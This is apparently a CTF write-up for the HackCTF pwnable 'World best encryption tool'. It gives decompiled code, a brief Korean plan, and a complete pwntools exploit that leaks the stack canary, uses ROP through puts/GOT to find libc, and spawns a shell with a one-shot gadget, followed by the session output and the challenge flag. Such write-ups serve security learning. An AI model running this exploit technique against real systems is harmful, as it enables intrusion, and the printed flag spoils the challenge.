[HackCTF / pwnable] World best encryption tool

HackCTF - World best encryption tool

Summary

• 64bit

• rop

Analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int i; // [rsp+8h] [rbp-88h]
  char s1; // [rsp+Ch] [rbp-84h]
  char src[64]; // [rsp+10h] [rbp-80h]
  char dest; // [rsp+50h] [rbp-40h]
  unsigned __int64 v8; // [rsp+88h] [rbp-8h]
​
  v8 = __readfsqword(0x28u);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  do
  {
    puts("Your text)");
    __isoc99_scanf("%s", src);
    for ( i = 0; i <= 0x31; ++i )
      src[i] ^= 0x1Cu;
    strncpy(&dest, src, 0x39uLL);
    printf("Encrypted text)\n%s", &dest);
    puts("\nWanna encrypt other text? (Yes/No)");
    __isoc99_scanf("%s", &s1);
  }
  while ( !strcmp(&s1, "Yes") );
  if ( strcmp(&s1, "No") )
    printf("It's not on the option", "No");
  return 0;
}

"Your text)" 입력받는 곳에서 카나리값을 얻고 "Wanna encrypt other text? (Yes/No)"에서 rop로 libcbase를 얻고 다시 main으로 돌려서 oneshot gadget으로 쉘을 따면 된다.

Exploit

from pwn import *
​
e = ELF("./World_best_encryption_tool")
#p = process("./World_best_encryption_tool")
p = remote("ctf.j0n9hyun.xyz", 3027)
libc = e.libc
​
oneshot = 0xf1147
pr = 0x00000000004008e3
​
p.recvuntil(")\n")
payload = "A"*0x39
p.sendline(payload)
p.recvuntil("AAAAAAA")
canary = u64("\x00" + p.recv(7))
print "canary : " + hex(canary)
​
payload = "A"*(0x84-0x8)
payload += p64(canary)
payload += "A"*0x8
payload += p64(pr)
payload += p64(e.got["setvbuf"])
payload += p64(e.plt["puts"])
payload += p64(e.symbols["main"])
​
p.sendline(payload)
setvbuf_addr = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00")
libcbase = setvbuf_addr - libc.symbols["setvbuf"]
print "libcbase : " + hex(libcbase)
​
p.recvuntil(")\n")
payload = "A"*0x39
p.sendline(payload)
p.recvuntil("AAAAAAA")
canary = u64("\x00" + p.recv(7))
print "canary : " + hex(canary)
​
payload = "A"*(0x84-0x8)
payload += p64(canary)
payload += "A"*0x8
payload += p64(libcbase + oneshot)
​
p.sendline(payload)
p.recvuntil("option")
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/World_best_encryption_tool$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/World_best_encryption_tool/World_best_encryption_tool'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3027: Done
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
canary : 0x38cc634a744b1c00
libcbase : 0x7fce2399d000
canary : 0x38cc634a744b1c00
[*] Switching to interactive mode
$ cat flag
HackCTF{I_th0ught_X0R_is_the_w0rld_b3st_Encrypti0n}